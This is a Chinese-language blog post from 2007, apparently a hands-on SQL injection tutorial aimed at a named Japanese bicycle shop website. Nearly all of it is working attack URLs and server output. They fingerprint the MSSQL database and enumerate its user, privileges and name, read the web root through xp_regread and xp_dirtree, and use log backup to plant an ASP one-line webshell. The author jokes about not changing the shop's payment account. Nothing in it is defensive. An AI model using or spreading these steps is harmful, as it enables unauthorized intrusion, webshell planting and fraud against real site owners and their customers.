首页 > 网络安全 > 注射网站的详细步骤

注射网站的详细步骤

2007年10月19日 发表评论 阅读评论

第一步关闭友好的HTTP提示-
在 internet选项——高级   里面

我们开始

这是我们的目标
http://www.cycly.co.jp/shop/detail.asp?id=1106
(这个是一个卖自行车的网站 请大家不要修改里面的汇款帐号否则被抓到本人不负责)

1
首先判断是不是注入点
http://www.cycly.co.jp/shop/detail.asp?id=1106 and 1=1

提示:varchar 抣 '1106 and 1=1'

说明是字符型,我们改一下语句

http://www.cycly.co.jp/shop/detail.asp?id=1106' and 1=1–
正常

http://www.cycly.co.jp/shop/detail.asp?id=1106' and 1=2–
错误号是
   僄儔乕 '80020009'

说明这是一个字符型注入点

2
下面判断数据库类型:
http://www.cycly.co.jp/shop/detail.asp?id=1106' and (select count(*) from msysobjects)>0–

返回:
Microsoft OLE DB Provider for ODBC Drivers 僄儔乕 '80040e37'

[Microsoft][ODBC SQL Server Driver][SQL Server]僆僽僕僃僋僩柤 'msysobjects' 偼柍岠偱偡丅

/shop/detail.asp, 峴 17

大意是不存在msysobjects表,所以不是access数据库

http://www.cycly.co.jp/shop/detail.asp?id=1106'and (select count(*) from sysobjects)>0–

返回正常,说明是mssql

3
接着我们刺探信息
首先是数据库用户名:

http://www.cycly.co.jp/shop/detail.asp?id=1106'and user>0–
用户名为aicom

然后是数据库角色,也就是我们说的权限:

http://www.cycly.co.jp/shop/detail.asp?id=1106' and 1=(select IS_SRVROLEMEMBER('sysadmin'));–
返回错误,说明不是SA 🙁

http://www.cycly.co.jp/shop/detail.asp?id=1106' and 1=(select IS_MEMBER('db_owner'));–

返回正常,说明是db_owner权限

下面是数据库名:
http://www.cycly.co.jp/shop/detail.asp?id=1106' and db_name()>0–
数据库名为aicom

db_owner我们常用的方法是读网站目录,然后备份获得shell,很多朋友依然再用database差异备份的方法,这个方法不是不行,而是有个缺点,那就是获得的shell太大,动辄几十M
今天我们主要是来演示log备份获得webshell,它取得的webshell一般只有20-70KB左右,当然xiaolu在NBSI3中已经加入了这个方法,也许你也注意到了

好 我们现在来找网站的目录,有两种方法一种是xp_regread读注册表中
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots项
第二种是xp_dirtree列目录,挨这找,这个比较麻烦我推荐大家用工具辅助,要知道工具就是
代替人们重复工作的 🙂

4
下面我们读目录
http://www.cycly.co.jp/shop/detail.asp?id=1106';DROP TABLE lulu;create table [dbo].[lulu]([gyfd][char](255))–
建表

http://www.cycly.co.jp/shop/detail.asp?id=1106';DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into lulu (gyfd) values(@result);–
定义变量 并且用xp_regread读注册表的。。

http://www.cycly.co.jp/shop/detail.asp?id=1106' and 1=(select count(*) from lulu where gyfd >1)–

返回如下:
Microsoft OLE DB Provider for ODBC Drivers 僄儔乕 '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]峔暥僄儔乕丅varchar 抣 'c:\inetpub\wwwroot,,201 ' 偐傜 int 僨乕僞宆偵曄姺偱偒傑偣傫偱偟偨丅

/shop/detail.asp, 峴 17

所以目录就是c:\inetpub\wwwroot,一般情况下只要http//ip/file就可以访问该目录下的文件

但是由于IIS设置的原因,这个主机貌似不行,所以我们翻看目录最终找到目录是e:\wwwroot\cycly.co.jp
为了节省时间,列目录就不演示了,列目录的语句为
http://www.cycly.co.jp/shop/detail.asp?id=1106';drop table lulu_mulu;CREATE TABLE lulu_mulu(DirName VARCHAR(100), DirAtt VARCHAR(100),DirFile VARCHAR(100)) INSERT jiaozhu EXEC MASTER..XP_dirtree “e:\wwwroot\”,1,1–

http://www.cycly.co.jp/shop/detail.asp?id=1106' And (select top 1 char(124)%2Bcast(DirName as varchar(8000))%2Bchar(124)   from ( select top 1 DirName,DirAtt,DirFile from [lulu_mulu] order by DirName desc,DirAtt asc,DirFile desc ) as as_TableName order by DirName asc,DirAtt desc,DirFile asc )>0 And ''='
top后加数字就可以列出当前目录中的文件和文件夹

http://www.cycly.co.jp/shop/detail.asp?id=1106';DROP TABLE lulu_mulu–

5
下面我们开始log备份webshell

http://www.cycly.co.jp/shop/detail.asp?id=1106';alter database aicom set RECOVERY FULL–
数据库故障还原类型设为完全,这个地方一般都是设置为简单的。。

http://www.cycly.co.jp/shop/detail.asp?id=1106';create table cmd (a image)–

http://www.cycly.co.jp/shop/detail.asp?id=1106';backup log aicom to disk = 'e:\lulu2' with init–
用截断开始把前面的日志写入文件

http://www.cycly.co.jp/shop/detail.asp?id=1106';insert into cmd (a) values ('ma')–
这里注意ma就填你的一句话木马,最好将它进行一下编码。看操作。。sorry刚才忘了单引浩。。

http://www.cycly.co.jp/shop/detail.asp?id=1106';backup log aicom to disk = 'e:\wwwroot\cycly.co.jp\lulu2.asp'–
最后将备份的日志写入网站目录中

http://www.cycly.co.jp/shop/detail.asp?id=1106';drop table cmd;–
最后记得删除刚才的表

OK,备份完成

下面我们看看效果

http://www.cycly.co.jp/lulu2.asp

Microsoft VBScript 幚峴帪僄儔乕 僄儔乕 '800a000d'

宆偑堦抳偟傑偣傫丅: 'execute'

转载请注明:woyigui's blog [http://www.woyigui.cn/]
本文标题:注射网站的详细步骤
本文地址:http://www.woyigui.cn/2007/10/19/%E6%B3%A8%E5%B0%84%E7%BD%91%E7%AB%99%E7%9A%84%E8%AF%A6%E7%BB%86%E6%AD%A5%E9%AA%A4/

分类: 网络安全 标签:
  1. 本文目前尚无任何评论.
  1. 本文目前尚无任何 trackbacks 和 pingbacks.
*